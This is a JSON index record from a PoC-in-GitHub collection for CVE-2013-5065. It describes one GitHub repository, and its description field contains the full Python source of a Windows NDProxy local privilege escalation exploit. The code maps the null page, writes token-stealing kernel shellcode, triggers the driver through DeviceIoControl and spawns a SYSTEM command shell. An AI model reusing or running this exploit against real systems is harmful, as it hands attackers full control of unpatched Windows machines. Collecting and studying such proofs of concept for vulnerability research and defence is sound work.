PoC-in-GitHub/2013/CVE-2013-5065.json

[
    {
        "id": 15000564,
        "name": "RobbinHood",
        "full_name": "Friarfukd\/RobbinHood",
        "owner": {
            "login": "Friarfukd",
            "id": 6127925,
            "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6127925?v=4",
            "html_url": "https:\/\/github.com\/Friarfukd",
            "user_view_type": "public"
        },
        "html_url": "https:\/\/github.com\/Friarfukd\/RobbinHood",
        "description": "# NDPROXY Local SYSTEM privilege escalation # http:\/\/www.offensive-security.com # Tested on Windows XP SP3 # http:\/\/www.offensive-security.com\/vulndev\/ndproxy-local-system-exploit-cve-2013-5065\/     # Original crash ... null pointer dereference # Access violation - code c0000005 (!!! second chance !!!) # 00000038 ??              ???   from ctypes import * from ctypes.wintypes import * import os, sys   kernel32 = windll.kernel32 ntdll = windll.ntdll   GENERIC_READ     = 0x80000000 GENERIC_WRITE    = 0x40000000 FILE_SHARE_READ  = 0x00000001 FILE_SHARE_WRITE = 0x00000002 NULL = 0x0 OPEN_EXISTING = 0x3 PROCESS_VM_WRITE            = 0x0020 PROCESS_VM_READ             = 0x0010 MEM_COMMIT                  = 0x00001000 MEM_RESERVE                 = 0x00002000 MEM_FREE                    = 0x00010000 PAGE_EXECUTE_READWRITE      = 0x00000040 PROCESS_ALL_ACCESS          = 2097151 FORMAT_MESSAGE_FROM_SYSTEM  = 0x00001000 baseadd = c_int(0x00000001) MEMRES = (0x1000 | 0x2000) MEM_DECOMMIT = 0x4000 PAGEEXE = 0x00000040 null_size = c_int(0x1000) STATUS_SUCCESS = 0   def log(msg):     print msg   def getLastError():     \"\"\"[-] Format GetLastError\"\"\"     buf = create_string_buffer(2048)     if kernel32.FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL,             kernel32.GetLastError(), 0,             buf, sizeof(buf), NULL):         log(buf.value)     else:         log(\"[-] Unknown Error\")   print \"[*] Microsoft Windows NDProxy CVE-2013-5065 0day\" print \"[*] Vulnerability found in the wild\" print \"[*] Coded by Offensive Security\"                 tmp = (\"\\x00\"*4)*5 + \"\\x25\\x01\\x03\\x07\" + \"\\x00\"*4 + \"\\x34\\x00\\x00\\x00\" + \"\\x00\"*(84-24) InBuf = c_char_p(tmp)   dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, byref(baseadd), 0x0, byref(null_size), MEMRES, PAGEEXE) if dwStatus != STATUS_SUCCESS:     print \"[+] Something went wrong while allocating the null paged memory: %s\" % dwStatus     getLastError() written = c_ulong() sh = \"\\x90\\x33\\xC0\\x64\\x8B\\x80\\x24\\x01\\x00\\x00\\x8B\\x40\\x44\\x8B\\xC8\\x8B\\x80\\x88\\x00\\x00\\x00\\x2D\\x88\\x00\\x00\\x00\\x83\\xB8\\x84\\x00\\x00\\x00\\x04\\x75\\xEC\\x8B\\x90\\xC8\\x00\\x00\\x00\\x89\\x91\\xC8\\x00\\x00\\x00\\xC3\" sc = \"\\x90\"*0x38 + \"\\x3c\\x00\\x00\\x00\" + \"\\x90\"*4 + sh + \"\\xcc\"*(0x400-0x3c-4-len(sh)) alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, 0x00000001, sc, 0x400, byref(written)) if alloc == 0:     print \"[+] Something went wrong while writing our junk to the null paged memory: %s\" % alloc     getLastError()   dwRetBytes = DWORD(0) DEVICE_NAME   = \"\\\\\\\\.\\\\NDProxy\" hdev = kernel32.CreateFileA(DEVICE_NAME, 0, 0, None, OPEN_EXISTING , 0, None) if hdev == -1:     print \"[-] Couldn't open the device... :(\"     sys.exit() kernel32.DeviceIoControl(hdev, 0x8fff23cc, InBuf, 0x54, InBuf, 0x24, byref(dwRetBytes), 0) kernel32.CloseHandle(hdev) print \"[+] Spawning SYSTEM Shell...\" os.system(\"start \/d \\\"C:\\\\windows\\\\system32\\\" cmd.exe\")",
        "fork": false,
        "created_at": "2013-12-07T05:37:28Z",
        "updated_at": "2016-09-04T16:47:18Z",
        "pushed_at": "2013-12-07T05:37:28Z",
        "stargazers_count": 0,
        "watchers_count": 0,
        "has_discussions": false,
        "forks_count": 1,
        "allow_forking": true,
        "is_template": false,
        "web_commit_signoff_required": false,
        "topics": [],
        "visibility": "public",
        "forks": 1,
        "watchers": 0,
        "score": 0,
        "subscribers_count": 1
    }
]